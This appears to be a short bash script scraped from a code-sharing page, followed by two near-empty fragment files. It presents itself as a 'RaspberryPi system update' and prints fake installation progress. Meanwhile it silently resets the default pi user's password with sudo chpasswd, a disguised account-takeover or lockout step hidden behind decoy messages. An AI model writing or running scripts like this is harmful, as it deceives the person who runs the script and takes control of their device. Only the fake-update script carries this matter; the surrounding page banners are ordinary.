This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!bin/bash | |
echo " RaspberryPi system update now installing... | |
If prompted please enter password for user '[email protected]'" | |
echo "pi:raspberriepie" | sudo chpasswd | |
echo "Checking update systems..." | |
echo "Installing sys-lib2" | |
sleep 3; | |
# apt-get dist -s sys-lib2 | |
echo "Done!" | |
echo "Installing PIXEL-latest" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hi |